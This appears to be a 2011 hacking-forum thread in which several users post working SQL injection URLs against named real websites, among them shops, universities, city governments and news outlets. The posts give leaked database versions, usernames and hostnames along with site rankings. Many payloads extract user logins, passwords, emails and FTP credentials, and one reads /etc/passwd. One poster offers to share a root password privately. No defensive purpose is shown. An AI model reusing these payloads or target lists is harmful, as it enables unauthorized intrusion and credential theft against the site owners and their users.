http://www.bobandbarn.com/news/stories.php?id=-42+union+select+1,2,3,version(),5,6,7--+
http://www.rorkesdriftvc.com/discussion.php?topid=15168&forid=-1)+union+select+version()--+
http://www.morrisminorspares.net/shop_item.php?ID=-1936+union+select+1,2,3,version(),5,6,7,8,9,0,1,2, 3,4--+
http://www.sport-shoes.ru/viewitem.php?num=(-312)union(select(1),2,version(),4,5,6,7,8,9,(10)fr om(information_schema.columns)where(table_name)='u sersmin')--+
http://www.vitecmultimedia.com/productv2.php?id=-1+union+select+1,2,3,4,5,6,version%28%29,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 ,62,63,64
winstrool
26.06.2011, 23:12
http://xxxdrom.u-gu.ru/news_view.php?id=1678%27+union+select+1,2,3,concat _ws%280x3a,user%28%29,version%28%29,database%28%29 %29,5,6,7,8+from+adminxxx+--+
user5293@localhost:5.0.91-community-log:user5293_xxxdrom
http://www.frs24.ru/news_view.php?id=-3%27+union+select+1,2,3,4,5,6,concat_ws%280x3a,use r%28%29,database%28%29,version%28%29%29,8+--+
frs24ru@localhost:frs24ru:5.0.26-log
http://www.bboyoriginals.eu/news/news_view.php?id=-104%27+union+select+1,2,concat_ws%280x3a,user%28%2 9,version%28%29,database%28%29%29,4,5,6,7,8,9,0,11 ,12,13,14,15,16,17+from+users+limit+0,1--+
maybe_bboy@localhost:5.0.92-community:maybe_bboy
Agentura.Ru
blind
Code:
http://www.agentura.ru/dossier/russia/fsb/?id=1307543520+and+%28SELECT+substring%28concat%28 1,password%29,1,1%29+from+bak_users+limit%200,1%29 =1
TIC: 1300
PR: 5
Mikhail Veller official site
Code:
http://www.weller.ru/?id=22&cid=-7+union+select+1,pass,3,4,5+from+users+--+
admin panel: /users.php
TIC: 450
PR: 4
SergioRezza
28.06.2011, 23:55
http://www.advancedbiofuelsassociation.com/news.php?id=-72+union+select+1,concat_ws(0x3a,id,username,passw ord,name,email),3,4,5,6,7,8,9,10,11+from+users+whe re+id=1--
PR: 4 TIC: 0
--------------------------------------------------------------------
http://www.thetech.org/genetics/news.php?id=13%27%20AND%201%3D2%20UNION%20SELECT%2 01%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12% 2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22% 2C23%2C24%2C25%2C26%2C27%2C28%20%23
PR: 7 TIC: 100
Skofield
29.06.2011, 02:15
http://www.foroaeronautico.org/PHP/noticias.php?id=-221+union+select+1,2,3,4,version(),6,7,8,9,10--
Database Version: 5.0.77
Database name: qgp837
User name: qgp837@217.76.130.95
Cennarios
30.06.2011, 03:40
The "Internet without SH*T" campaign continues
http://www.euroairport.com/FR/communiques.php?idcommunique=11512+union+select+1, unhex%28hex%28user%28%29%29%29,3,4,5,6,7,8,9,10,11 ,12,13--+
Code:
http://www.bikedekho.com/user-review/tvs-jive/dont-purchase_857-2%20AND%201=0%20UNION%20SELECT%20CONCAT%28%27%20%2 7,%20name,%20%27%20%27,%20pass,%20%27%20%27,%20mai l,%20%27%20%27%29%20FROM%20users%20LIMIT%202,1.htm l
Mikrodata company
Code:
http://www.microdata.odessa.ua/shop1/goods.php?id=-99+union+select+1,2,user,4,5,6,7,8,9+from+mysql.us er--+
v: 4
TIC: 100 \ PR: 3
Code:
http://www.cheptelaleikoum.com/membre.php?id=-27+/*!UnIoN*/SeLeCT+1,2,3,4,5,6,concat_ws(0x3a,@@version,user() ,database(),@@version_compile_os),8,9,10,11,12,13, 14,15,16,17,18,19--+
4.0.27-max-log:dbo209534058@212.227.114.140: db209534058: pc-linux-gnu
Code:
http://www.trip-hop.net/membre.php?id_membre=-1355+union+all+select+1,concat_ws(0x3a,@@version,u ser(),database(),@@version_compile_os),3,4,5,6,7,8 ,9,10,11,12,13,14,15
5.0.90-log:triphop5base@10.0.84.164:triphop5base: pc-linux-gnu
Code:
http://www.promotie.nl/promo.php?cat=-9+UnIoN+all+select+concat_ws(0x3a,@@version,user() ,database()),2
5.0.91-community:deb8417_hps@localhost:deb8417_hps
KeyGanger
02.07.2011, 15:27
Tech Noir (Web Design)
Code:
http://www.tnoir.com/work.php?id=131+limit+0+union+select+1,group_conca t(0x3c62723e,concat_ws(0x2e,table_schema,table_nam e,column_name)),3,4,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19+from+information_schema.columns+where+co lumn_name+like+0x2570617325
Yandex TIC: 20
Yandex.Rank: 2
Google PageRank:2/10
KeyGanger
02.07.2011, 16:03
[Programming languages - Life-Prog]
Code:
http://life-prog.ru/view_linux.php?id=3'+limit+0+union+select+1,group_ concat(0x3c62723e,concat_ws(0x207c20,login,passwor d)),3,4+from+users+--+a
Yandex TIC: 40
Yandex Rank: 3/6
Google PageRank: 3/10
KeyGanger
03.07.2011, 16:59
[ «Svoy Biznes», the leading Russian publication for passionate entrepreneurs ] Blind SQL injection
Code:
http://www.mybiz.ru/page.php?id=2+and+1=1
http://www.vize.cz/en/news.php?id=-348+union+select+1,2,3,4,5,version%28%29+--+
Output in the title
http://www.deafmissions.org/?PageID=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,version%28 %29+--+
Expl0ited
06.07.2011, 15:45
Code:
http://apps.facebook.com/sondaggi-fanpage/vote.php?id=(0)union(select(1),version(),3,4,5,6,7 ,8,9)--+
5.1.45-log
Code:
http://www.webmobileshop.com/mobiledetails.php?mobileid=412+union+select+1,2,3, 4,concat_ws(0x3a,username,password,email),6,7,8,9+ from+alumni_admins+--+
PR 2
Code:
http://www.freshex.at/webshop/webshop.php?product_group=-4+union+select+version()+--+
PR 2
5.0.51a-24+lenny5
Lam3rsha said:
http://www.mmorpg-servers.com/index.php?cat=RF+Online&qq=2.2.2' if anyone is able to take this SQL injection further, I'd be grateful
Code:
http://www.mmorpg-servers.com/index.php?cat=RF+Online&qq=2.2.2'and(select/**/1/**/from(select/**/count(*),concat(version(),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)and'1'='1
version: 5.0.92-community
user: mmoserv_mmoserv
database: mmoserv_mmoservers
Table output:
Code:
http://www.mmorpg-servers.com/index.php?cat=RF+Online&qq=2.2.2'and(select/**/1/**/from(select/**/count(*),concat((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema!='information_schema'/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)and'1'='1
Osstudio
08.07.2011, 01:24
Online bookstore.
http://www.tech-books.purput.ru/newsdetail.shtml?idnews=21+and+1=0+union+select+us er%28%29,database%28%29,version%28%29--
bloodAngel
08.07.2011, 10:56
Code:
http://www.bard.edu/academics/additional/additional_pop.php?id=204042-999999+union+select+1,2,version(),4,5,6,7,8,9,10,1 1,12,13,14--
TIC 90 PR 7, edu
bloodAngel
08.07.2011, 10:58
Code:
http://www.gs1.org/1/gtinrules/index.php/nid=1%20or%281,2%29=%28select*from%28select%20name _const%28version%28%29,1%29,name_const%28version%2 8%29,1%29%29a%29
'5.0.51a-24+lenny5-log'
TIC 90 PR 7 ))))
http://www.mtucizone.ru/teacher/list.htm?id=-12+union+select+1,2,concat_ws(0x3a,name,password), 4+from+mtucizone.ibf_members--
SergioRezza
08.07.2011, 22:28
http://www.thefump.com/artist.php?id=11%20%26%26%201%3D2%20UNION%20SELECT +1,2,3,4,concat_ws(0x3a,id,username,password,email ,paypal_email),6,7,8,9,10,11,12,13,14,15,16+from+u sers%23
go ahead and decrypt =)
cannabisfunclub.com
a cannabis site
Code:
http://www.cannabisfunclub.com/chtivo/?news=-215+union+select+1,2,3,version%28%29,5,6,7,8,9,10, 11,12,13,14+--+
version: 5.0.51a-community
database: mrc_db2
user: mrc_db2@localhost
http://www.townoflakeshore.on.ca/lakeshore_1.php?page=-11 (7 columns)
5.0.67:
lakeshore@172.27.1.10:
lakeshore_lakeshore:
suse-linux-gnu
PR 4
http://www.lakeshore.ca/events.php?id=-722 (5 columns)
5.0.67:
lakeshore@172.27.1.10:
lakeshore_lakeshore:
suse-linux-gnu
PR 4
http://www.hawaii.edu/uhhbiology/index.php?page=person&id=-43 (14 columns)
4.1.20-standard-log:
uhhbiology@web41.pvt.hawaii.edu:
uhhbiology_d:sun-solaris2.8
PR 8
http://www.mycrysis.com/forums/memberlist.php?mode=viewprofile&u=679708%27
(yikes, phpbb 2007, mysqli(4.1++))
PR5
http://www.gilcentr-sk.ru/?id=-22+union+select+1,2,3,4,5,version(),7,8,9--
http://busexplorer.com/PHP/FeaturePage.php?id=-22+union+select+1,group_concat(0x0b,table_name),3, 4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_ schema.tables--
http://www.taliman-nsk.ru/?page=goodslist&id=-22+union+select+1,group_concat(0x0b,table_name)+fr om+information_schema.tables--
totenkopf
10.07.2011, 19:25
Code:
http://www.dalsouple.com/News.php?nid=2+and+0+UNION+SELECT+1,2,3,concat_ws( 0x3a,user(),version(),database()),5,6+--+
http://www.easyfresh-logistics.com/news.php?nid=2'+and+0+UNION+SELECT+1,2,3,4,concat_ ws(0x3a,user(),version(),database()),6+--+
http://www.globestravel.com/php/newsDetails.php?nid=2+and+0+UNION+SELECT+1,2,conca t_ws(0x3a,user(),version(),database()),4+--+
http://www.greatecs.com/en/news/details.php?nid=2+and+0+UNION+SELECT+1,2,3,4,conca t_ws(0x3a,user(),version(),database()),6,7,8+--+
http://www.midrma.com/News.php?nid=2+and+0+UNION+SELECT+1,2,concat_ws(0x 3a,user(),version(),database()),4+--+
http://www.molecularpartners.com/tmp2.php?nid=2&sid=5&cid=12+and+0+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a ,user(),version(),database()),7,8+--+
http://www.music-powerhouse.com/news.php?nid=2'+and+0+UNION+SELECT+1,concat_ws(0x3 a,user(),version(),database())+--+
http://www.pacificwestsound.com/news.php?nid=2+and+0+UNION+SELECT+concat_ws(0x3a,u ser(),version(),database())+--+
http://www.pcgengr.com/news_detail.php?nid=2+and+0+UNION+SELECT+1,2,3,4,c oncat_ws(0x3a,user(),version(),database())+--+
http://www.pickcells4pixels.com/index.php?nID=2+and+0+UNION+SELECT+1,2,3,4,5,6,7,8 ,9,10,11,concat_ws(0x3a,user(),version(),database( )),13,14+--+
http://www.portmeirion-village.com/content.php?nID=2;lID=1+and+0+UNION+SELECT+1,conca t_ws(0x3a,user(),version(),database()),3,4+--+
A few fat ones.
Moscow Chamber of Commerce and Industry. TIC 1600 PR 5
Code:
http://www.mostpp[это не я].ru/news.php?id=-5805+union+select+concat_ws(0x3a,login,pass)+ from+users+limit+0,1
We have an injection with output in the page source:
Code:
Вернуться к общему списку сообщений
and, as befits sites like this, with passwords in plaintext.
Islam for Everyone. TIC 850 PR 3
Code:
http://islam.com.[не, посоны - я не разжигаю]ua/admin/modules/articles/print.php?nid=-1+union+select+1,2,3,4,version(),database(),7,8,9, 10,user(),12,13
We have an injection in MySQL 4.1.25 with 3 printable fields.
And for dessert - a social network with over 275k accounts on board.
Code:
http://www.33hoch[посоны, я не при делах]u.ru/likes.php?id=-122604'+or+1+group+by+concat((select+login+from+us er+limit+275000,1),floor(rand(0)*2))having+min(0)+ or+1--+
We have an injection with output in the error.
winstrool
10.07.2011, 23:33
PR 3 TIC 60
http://foxconncase.ru/index.php?id=10&model=-86+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,use r(),version(),database()),0,11,12,13,14+--+&series=15&cHash=b165aa222fe72a04b3041cf1274ec149
u58908@10.8.0.102:5.0.90-log:u58908
PR 2 TIC 10
http://www.nks24.ru/text.php?id=-24+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6+--+
u99856@78.108.84.161:5.0.90:b99856_nks24
PR 3 TIC 70
http://dead-cities.ru/text.php?id=8600000000000000000'+UnIon+selECt+1,co ncat_ws(0x3a,user(),version(),database())+--+
dbu_kovaldji_1@192.168.9.91:5.0.77-log:db_kovaldji_1
pr 2
http://proishestvie.org/page.php?id=-1'+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6,7+--+
lito@localhost:5.1.54-rel12.5-log:lito
Cennarios
11.07.2011, 19:17
www.zacks.com
PR 7
http://www.zacks.com/blog/archive.php?g=-6+union+select+1,2,version%28%29,4,5,6--+
PR 3, TIC 70
Code:
http://www.i-watch.ru/?section=7&sid=-3+union+select+1,2,3,version(),5,6,7--+
5.0.51a-24+lenny4
___
PR: 4, TIC: 30
Code:
http://www.watch.su/search_cat.php?word=&start=1a&end=20a&where=1)and(select 1 from(select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a)--+
5.0.33
Code:
http://cluster2.space.swri.edu/article.php?id=-1+union+select+1,2,concat_ws(0x3a,user,password),4 ,5,6,7,8+from+mysql.user+--+
PR 4
Code:
http://www.thalictrum.com/index.php?pageid=6&artid=-6+union+select+1,concat_ws(0x3a,id,username,passwo rd),3,4,5,6,7,8,9,10,11,12+from+user+--+
4.1.20
PR 4
Code:
http://www.gp.org/press/pr-state.php?ID=-416'+union+select+version(),2,3,4,5,6+--+
5.0.45-log
TIC 30
PR 6
Code:
http://www.bdnews24.com/details.php?cid=10&id=-195068+union+select+1,2,concat_ws(0x3a,ftpurl,ftpu ser,ftppass)+from+ftpsecure--
The info is displayed on the right, under the Facebook block ))
5.0.45-log
TIC 30
PR 5
Code:
http://www.africasia.com/africanbanker/afbnk.php?ID=-2356+union+select+version(),2,3,4,5,6,7,8,9,10+--+
5.0.84-log
TIC 50
PR 6
Code:
http://www.infovis.net/printMag.php?lang=2&num=-98+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13+--+
5.0.67-Max
TIC 10
PR 5
Code:
http://www.mysecret.tv/secret.php?id=3964+union+select+1,2,3,4,concat_ws( 0x3a,user_id,username,password,email),6+from+user+--+
5.0.58
TIC 10
PR 3
Code:
http://www.thisweekinpalestine.com/details.php?id=3323&ed=191&edid=-191+union+select+1,concat_ws(0x3a,id,username,emai l,password),3,4,5+from+members+limit+1,1+--+
5.0.77
TIC 10
PR 5
TIC 10 PR 1
HTML:
http://www.lz-studia.ru/index.php?p=111&idp=-4+union+select+1,2,version(),4
TIC 10 PR 4
HTML:
http://www.hobbycenter.by/news.php?id=27+union+select+1,2,3,4,5,6--
Cennarios
16.07.2011, 18:52
http://www.fair.org/index.php?page=22&media_view_id=-10679+union+select+1,2,3,4,5,user%28%29--+
TO: Kuteke - Sick of people posting a bare quote mark. The section is called SQL-INJECTION, so post a WORKING injection and not a link capped with a quote mark.
TIC 0 PR 3
HTML:
http://www.nnovia.com/news.php?id=2+union+select+1,2,3,4,5,6,7,8,9--
TIC 0 PR 3
HTML:
http://scuderiatopolino.com/news.php?id=2+union+select+1,2,3,4,5,6--
2Cennarios: OK! Fixed)
<Cyber-punk>
17.07.2011, 21:27
PR 4
http://www.luxsoft.eu/luxcal/index.php?xP=11&id=-326415+union+all+select+1,2,@@version,user(),5,dat abase(), 7,8,9, 10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27--
PR 2
http://www.menus.ca/restaurant.php?id=-1%20and(select%201%20from(select%20count(*),concat ((select%20(select%20user())%20from%20`information _schema`.tables%20limit%200,1),floor(rand(0)*2))x% 20from%20`information_schema`.tables%20group%20by% 20x)a)%20and%201=1
Code:
http://www.heaalgus.ee/index.php?e_id=(@:=1)or@+group+by+concat(@@version ,@:=!@)having@||min(0)--+
VERSION:5.0.92-log1
LUSER:heaalgus@nw.eenet.ee1
winstrool
18.07.2011, 15:27
TIC 20 PR 4
http://www.voentursnar.ru/product.php?cat=-35'+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,0,11,12+--+
e3cdrcom_voentur@localhost:5.0.26-log:e3cdrcom_voentur
TIC 10 PR 2
http://www.m-graf.ru/prod.php?id=3&id2=0&item=-13'+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database()),6,7,8,9,0,11,12,13,14,15,16+--+
m-graf-6@web21.corp.parking.ru:4.1.20-community-nt-log:m-graf-6
PR 1
http://alekseysannikov.ru/pages/videosemka_article.php?num=-2+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3+--+
p4707_db@91.218.229.12:5.0.92-50-log4707_db
TIC 10 PR 2
http://www.kazango.ru/catalog/view.php?id=-182'+/*!UNION*/+/*!SELECT*/+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),datab ase()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42+--+
coa191@localhost:5.1.49-rel11.3-log:coa191_kazango
Expl0ited
19.07.2011, 14:56
Code:
http://apps.facebook.com/mypersonality/view_reviews.php?rating=1&test_id=10+and(1=0)union(select(1),version(),3,4,5 ,6,7,8,9,10,11,12,13)--+
5.0.67-log
blah blah, damn it
http://addr.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=/etc/passwd&aid=-2/**/union/**/select/**/0,concat_ws%280x3a,email,username,name,password,us ertype,block%29,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0+from+jos_users--
http://kostomuksha-city.ru/main.phtml?nid=-1+union+select+1,2,version%28%29,4,5
Code:
http://www.neutralposture.com/_site/news.php?id=-12+union+select+1,version(),user(),4,5,6+--+
http://www.neutralposture.com/_site/news.php?id=-12+union+select+1,2,concat_ws(0x3a,user,password), 4,5,6+from+mysql.user+--+
TIC 10
PR 5
P.S. I can send the root password by PM to whoever needs it)
----
Code:
http://www.reproductivemedicine.com/toc/auto_abstract.php?id=-21868+union+select+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22+--+
5.0.45
TIC 20
PR 5
----
Code:
http://www.autodostavka.ru/index.php?id=729&model=-1274'+union+select+1,2,3,4,5,version(),7,8+--+
5.1.54-log
TIC 200
PR 4
----
Code:
http://www.libertynickels.org/articles.php?num=-6+union+select+1,concat_ws(0x3a,username,password) ,3,4+from+users+--+
PR 2
----
Code:
http://www.feldgrau.com/articles.php?ID=-54+union+select+1,2,3,4,version(),6,7,8+--+
5.0.51a-3ubuntu5.8
TIC 40
PR 5
Code:
http://www.vertigomagazine.co.uk/showarticle.php?sel=bac&siz=1&id=-927+union+select+1,2,concat_ws(0x3a,userid,loginna me,password,access),4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 ,33+from+users+--+
TIC 10
PR 5
--
Code:
http://www.maketheroad.org/article_print.php?ID=-178+union+select+version(),2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23+--+
5.1.54
TIC 10
PR 6
Code:
http://www.igps.net/about/press.php?id=-101+union+select+1,2,version(),4,5,6,7,8+--+
5.0.51a-24+lenny4-log
PR 5
Code:
http://www.cyberbody.ru/product.php?id=-569+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32+--+
5.0.90-log
TIC 20
PR 3
Code:
http://www.director-online.com/buildArticle.php?id=-988+union+select+1,2,3,4,5,concat_ws(0x3a,user_nam e,user_password),7,8+from+user+limit+0,1+--+
5.1.58-community-log
TIC 10
PR 5
Code:
http://www.fluidanims.com/collections.php?id=-7+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29--
Username: fluidanimsgrid@184.168.193.76
Version: 5.0.91-log
Database: fluidanimsgrid
Google PR: 4
Code:
http://www.guuui.com/posting.php?id=-2058+union+select+1,2,3,concat_ws(0x3a,name,email, password),5,6,7,8,9,10,11,12,13,14+from+users+--+
5.0.91-log
TIC 20
PR 5
immortalist
21.07.2011, 06:24
TIC 20, Yandex.Catalog
http://telefan.ru/realtone.php?id=-1 UNION ALL SELECT concat(0x7e,0x27,(Select @@version),0x27,0x7e)--
Code:
http://katrinalist.columbia.edu/details.php?id=-82+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32+--+
4.1.22-log
PR 4
Code:
http://ripflv.com/video.php?id=-32013+union+select+1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15+--+
5.0.77
PR 3
Code:
http://www.wildflower.org/feature/?id=-27+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29, version%28%29,database%28%29%29,5,6,7,8--
Username: wildflow_npin@homer.cc.utexas.edu
Version: 5.0.76-enterprise-gpl-log
Database: wfc_weblive
Google PR: 7
Code:
http://www.riviera-crimea.com/detail.php?id=-425'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,co ncat_ws(0x3a,user(),version(),database()),15,16+--+
riviera_bd@localhost
5.1.47
riviera_w
cy: 10, pr 3
Code:
http://www.designforchange.co.uk/news_detail.php?id=-84+union+select+1,concat_ws%280x3a,user%28%29,vers ion%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12--
Username: designfo_user@localhost
Version: 5.0.92-community
Database: designfo_main
Google PR: 6
===================
Code:
http://www.shelterbox.org/deployment_details.php?id=-150+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54%20from%20chAdmin--
Username: shelterbox@localhost
Version: 5.1.52
Database: shelterbox
NOT A REPOST! The domain zone is different.
Google PR: 6
Code:
http://soglasovanie-vremen.ru/page.php?id=0'+union+select+1,concat_ws(0x3a,user( ),version(),database()),3,4,5+--+
karakovski@localhost
5.1.49-rel11.3-log
karakovski
PR 3
Code:
http://www.shanalogic.com/idevaffiliate/idevads.php?id=175&ad=-1+union+select+1,2,3,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29,5,6--
Username: shanalog_idev@10.2.2.10
Version: 5.0.77
Database: shanalog_idev
Google PR: 4
Shop
winstrool
23.07.2011, 22:31
TIC 10 PR 4
http://sscw.ee/pages/modules/event_calendar/details_popup.php?entry_id=-85+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database()),6,7,8+--+
d21554sa28781@sn5.zone.eu:5.1.37-log:d21554sd21106
PR 2 TIC 30
http://www.ickovcheg.ru/?s=&newsid=100+union+select+1,2,concat_ws(0x3a,user(), version(),database()),4,5+--+
anderew_bd@77.221.130.2:5.1.49-3-log:anderew_bd
PR 2
http://www.agent2k.ru/?s=adv&advid=1+union+select+1,2,3,4,concat_ws(0x3a,user() ,version(),database())+--+
u143185_1@10.8.0.60:5.0.90-log:u143185_1
TIC 20 PR 2
http://www.konstruktiv.ru/?n=39+union+select+1,2,concat_ws(0x3a,user(),versi on(),database()),4+--+
m0rri5_root@localhost:4.1.25-log:m0rri5_ievk
TIC 10 PR 2
http://www.centerclub.ru/index.php?cat=about&r_id=18'+union+select+1,concat_ws(0x3a,user(),vers ion(),database()),3,4+--+
centerclub_base@localhost:5.0.77:ilya_centerclub
PR 2
http://www.oktan.com.ua/auto_sites/view.php?id=-172+UnIon+selECt+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18+--+
oktan_admin@localhost:5.1.49-3-logktan_main
TIC 110 PR 4
http://www.obruch.ru/index.php?id=8&n=30&r=9+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5+--+
vh27377@zvm12.host.ru:4.0.27-log:vh27377
TIC 20 PR 1
http://www.soyuznik.ru/index.php?catID=-1416+union+select+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5,6,7,8,9,0,11,12,13,14,15+--+
gb_soyuz_unix@10.0.2.2:5.0.70-log:gb_soyuz_unix
August12
25.07.2011, 03:57
Target: http://www.bowenshideout.com/items.php?id=87
Host IP: 65.61.119.130
Web Server: Apache/2.0.58 (Unix) PHP/4.4.6 mod_ssl/2.0.58 OpenSSL/0.9.7i
Powered-by: PHP/4.4.6
DB Server: MySQL >=5
Resp. Time(avg): 931 ms
Current User: ann@localhost
Sql Version: 5.0.15
Current DB: nichebox
System User: ann@localhost
DB User: 'ann'@'localhost'
Data Bases: information_schema
==========================================
Blind
Target: http://www.depalo.com/view_item.php?id=2257
Host IP: 64.226.181.99
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 1227 ms
Current User: depaloUser@localhost
Sql Version: 5.0.77-log
Current DB: depalo
System User: depaloUser@localhost
Host Name: ipdmmg0021atl2.pubip.peer1.net
Installation dir: /usr/
DB User: 'depaloUser'@'%'
Data Bases: information_schema
depalo
==================================================
Target: http://enbarsenal.com/item/view_item.php?id=2257
Host IP: 69.163.133.73
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 899 ms
Current User: net7user@apache2-prance.gravano.dreamhost.com
Sql Version: 5.1.53-log
Current DB: net7
System User: net7user@apache2-prance.gravano.dreamhost.com
Host Name: fwap
Installation dir: /data/mysql/deakyne/
DB User: 'net7user'@'67.205.0.0/255.255.192.0'
Data Bases: information_schema
net7
==============================================
Target: http://www.yourprops.com/view_item.php?movie_prop=10270
Host IP: 74.208.106.166
Web Server: Apache/2.2.6 (Fedora)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Resp. Time(avg): 909 ms
Current User: admin@localhost
Sql Version: 5.0.27
Current DB: yourprops
System User: admin@localhost
Installation dir: /usr/
Data Bases: information_schema
horde
mysql
phpmyadmin_AVMLiZ09j6Cb
phpmyadmin_IiabUsiU1n6q
phpmyadmin_g5Dqcuu61ikC
psa
yourprops
Do NOT multiply posts; put everything into one post if nobody has posted a message after you
winstrool
26.07.2011, 00:50
PR 1
http://www.stepportal.ru/view_item.php?id=-7'+UnIon+selECt+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,u ser(),version(),database()),11,12,13+--+
gb_z_stepp17f@10.0.2.19:5.1.46-log:gb_z_stepp17f
TIC 10 PR 2
http://www.club-parlament.de/ajg/view_item.php?id=28052000000000000+union+select+co ncat_ws(0x3a,user(),version(),database())+--+
drupal@localhost:5.1.49-3:d_parlament
PR 1
http://www.lighter.ru/view_item.php?id=1156+UnIon+selECt+1,2,3,concat_ws (0x3a,user(),version(),database()),5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20+--+
lighter@zvm13.host.ru:4.0.27-log:lighter
TIC 10
http://tiger.in.ua/view_item.php?id=-541+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,version(),database()),8,9,0,11,12,13,14,15+--+
mandrey_tiger@localhost:4.0.27-standard-log:mandrey_tiger
http://mandrey.uran.biz.ua/view_item.php?id=-100+union+select+1,2,3,4,5,6,concat_ws(0x3a,user() ,version(),database()),8,9,0,11,12,13,14,15+--+
mandrey_profi@localhost:4.0.27-standard-log:mandrey_profi
Cennarios
26.07.2011, 14:28
Achtung )
http://www.spaceweather.com/flybys/sat_popup.php?sat_name=-Idefix%20and%20Ariane%2042B%27+union+select+1,2,3, 4,version%28%29,6,7,8--+
winstrool
26.07.2011, 18:08
http://opulent-style.com/view_item.php?id=473+OR+(SELECT+COUNT(*)+FROM+(SEL ECT+1+UNION+SELECT+2+UNION+SELECT+3)x+GROUP+BY+CON CAT(MID((select+concat_ws(0x3a,user(),version(),da tabase()),1,63),+FLOOR(RAND(0)*2)))--+
artem@68.178.254.169:4.1.24-max-log:artem
http://elgaucho.ru/newsite/ru/culture.php?id=80000000000000+union+select+1,conca t_ws(0x3a,user(),version(),database()),3,4,5,6,7,8 +--+
elgaucho_mysql@10.1.137.54:5.1.41-log:elgaucho_elgaucho
http://www.koreatravel.ru/culture/index.php?id=-95'+union+select+1,2,concat_ws(0x3a,user(),version (),database())+--+
koreatrave@localhost:5.0.26-log:koreatrave
http://www.maglogos.ru/catalog.php?r=-10+union+select+1,concat_ws%280x3a,user%28%29,vers ion%28%29,database%28%29%29,3+--+
veretenina_bs@localhost:5.0.77-log:veretenina_bs
http://www.kabelcom.ru/content.php?id=16+union+select+1,concat_ws%280x3a, user%28%29,version%28%29,database%28%29%29+--+
kabelcomru@localhost:5.1.50-lk-log:kabelcomru
COOLBOY007
26.07.2011, 22:10
Code:
http://www.hkyongnuo.com/e-detail.php?ID=-281+union+select+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40+--+
web2u16@127.0.0.1:5.1.56:web2db16
PR 3
TIC 20
winstrool
27.07.2011, 13:01
http://www.sirius55.ru/order.php?id=-737'+union+select+1,concat_ws(0x3a,user(),version( ),database()),3,4,5,6,7,8,9,0+--+
sirius55ru@localhost:5.0.56-lk-log:sirius55ru
http://dushevaya.ru/order.php?id=-490'+UnIon+selECt+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7+--+
dushevaya@localhost:5.1.49-3:dushevaya
http://www.slidell.la.us/cal-view.php?ID=-712+UnIon+selECt+1,concat_ws(0x3a,user(),version() ,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46+--+
slidell@localhost:4.1.22-log:cityofslidell
Decided to have a bit of fun))
